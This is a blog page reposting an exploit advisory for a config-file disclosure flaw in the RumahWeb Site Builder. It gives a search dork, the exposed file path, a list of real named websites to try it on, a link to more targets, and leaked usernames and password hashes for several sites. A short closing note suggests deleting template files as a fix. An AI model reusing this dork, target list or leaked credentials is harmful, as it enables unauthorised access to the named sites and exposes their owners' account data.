EDDY PHONES CELLULAR

EDDY PHONES CELLULARBlog | Created By www.rohmansyah.info

Popular Posts

save/share/bookmark

Category List

download (73) software (38) trikjumper (36) hardware (29) blackberry (26) android (21) firmware (21) samsung (20) internet (12) nokia (9) china (8) default (8) unlock (8) driver (6) Fancy (5) Photo (5) upgrade (5) Blackberry Loader Creator ALL in One (4) Create (4) GAMES ETC (4) Screen (4) Updated (4) WALLPAPERS (4) antivirus (4) flashing (4) iphone (4) sony ericsoon (4) APPLICATION (3) Andriod (3) Awesome (3) Effect (3) Effects (3) Fruit (3) LG (3) Ninja (3) Photos (3) RINGTONES (3) Rotation (3) SCHEMATICS (3) SERVICE MANUALS (3) Slice (3) Smart (3) Style (3) THEMES (3) TUTORIALS AND TIPS (3) Texts (3) Touch (3) Unique (3) Update (3) camera (3) crack (3) seo (3) tools (3) 612231 (2) 740194 (2) 8900 (2) 9000 (2) 9500 (2) 9700 (2) 9780 (2) ALL LG KP CHARGE WAY (2) BIS (2) Blasphemy (2) Build (2) Coral (2) Miracle (2) November (2) Studio (2) Theme (2) XL (2) added (2) asiafone (2) contactus (2) cross (2) ht (2) imo (2) schematic (2) unlock tool blackberry 2012 (2) 01027m (1) 2012101 (1) 25102012 (1) 8100 (1) 8110 (1) 8120 (1) 8310 (1) 8320 (1) 8520 (1) 9220 (1) 9300 (1) 9360 (1) 9800 (1) 9810 (1) ALCATEL (1) AXIS (1) AccuWeather (1) Aktivasi BIS (1) Boost (1) CDMATool (1) Center (1) Coming (1) Denmark (1) Digital (1) Dragon (1) Final (1) Firmware ROM Releases (1) Firmware ROM Releases (1) Flightradar24 (1) Franco (1) Fully (1) GPGDragon (1) GPGJTAG (1) GPGWorkshop (1) Indosat (1) JTAGPro (1) Kernel (1) Keypad (1) LG Solution Mic (1) LGTOOL (1) Lapse (1) Launcher (1) Leaked Operating Software (1) MENGENAL SUARA HEWAN UNTUK ANAK KITA (1) MXBOX (1) Manager (1) Memedroid (1) Monitor (1) Nomor Awal Pin Blackberry (1) NsPro (1) OS Karya Anak Bangsa (Garuda OS) (1) Pantech (1) PinFind (1) Platinum (1) Power (1) Prank (1) Rebuild (1) Registered (1) Release (1) Released (1) Rescue (1) SOTWARE RESET PASSWORD WINDOWS 7 (1) Safari (1) Screams (1) Service (1) Spooky (1) Spreadtrum (1) StuffCalcv15 (1) Supported (1) Swisscom (1) Switzerland (1) Telia (1) Telkomsel (1) Three (1) Toolbox (1) Updater (1) VA - Music Under Water (2012) (1) Vignette (1) VolcanoBox (1) Volume (1) Widget (1) Zombonic (1) Zooper (1) auto lcd (1) bahasa (1) beyond (1) d-one (1) e220 (1) eWallet (1) etouch (1) features (1) full (1) g901t (1) games (1) huawei (1) idm (1) ime (1) instal (1) jalur cas bb 8520 (1) jalur charger BB 9530 (1) jalur charger bb 9700 (1) jalur charger gemini (1) kalkulasi (1) kenal (1) lcd (1) maxtron (1) mediafire (1) micxon (1) mito (1) modem (1) mxkey (1) onyx1 9700 (1) pc (1) pin (1) repair (1) resete (1) resume (1) salam (1) saspen (1) skema bb 9300 (1) skema bb 9530 (1) strom1 9530 (1) support (1) tinyCam (1) tour1 9630 (1) x3 (1)

Blog Archive

www.rohmansyah.info

Memuat...
Close (2X)

intext:sitebuilder rumahweb | Girilaya Real Groups

Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date : 08 Desember 2012
: # Author : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : Arbitrary Config File Disclosure Vulnerability
: # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
intext:sitebuilder rumahweb

Proof of Concept
================
[!] site/data/config/config.xml
For example you've searched it on google and got the result www.kratontour.com/admin
Change the URL to www.kratontour.com/data/config/config.xml

-------[ Content of www.kratontour.com/data/config/config.xml ] ----------------------
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<rows>
<domain>kratontour.com</domain>
<username>krato125</username>
<password>8889720046a32ce05e438c17c004af01</password>
</rows>
-------------------------------------------------------------------------------------
Or you got toyohashi-mosque.org/admin and you have to change the URL to oyohashi-mosque.org/data/config/config.xml


Example :
http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml
More results? http://pastebin.com/4VZpiC7e

Sumber : http://go.girilaya.com/0l0qwm
Twisted Evil

Warga GIRILAYA
Learning By DOING
http://blog.girilaya.com/

<rows><domain>baccojakarta.com</domain><username>bacco751</username><password>2f18edd9ec46eeca15a4b759c96c0d0d</password></rows>

bagi teman2 yang sudah terlanjur memakai SITEBUILDer tersebut . .. jangan kwatir dan jangan underestimate dulu. . . ita juga bisa PATCHing koq... dengan menghapus Template dan menghapus template.xml yang ada di /data/config/template.xml.

contoh web diatas bisa terliat karena masih barusan dibuat dan belum diHapus Templatenya..
Spoiler:



<rows><domain>pemikiranku.com</domain><username>pemik855</username><password>27a781f1f1ddde5ebc2dd2b796bfc736</password></rows>

<rows><domain>h2rtransport.com</domain><username>h2rtr239</username><password>c747ba108baa3d8212f86a319d445f7c</password></rows>

Posted by Rohmansyah
On - -
0 komentar »

Leave a Reply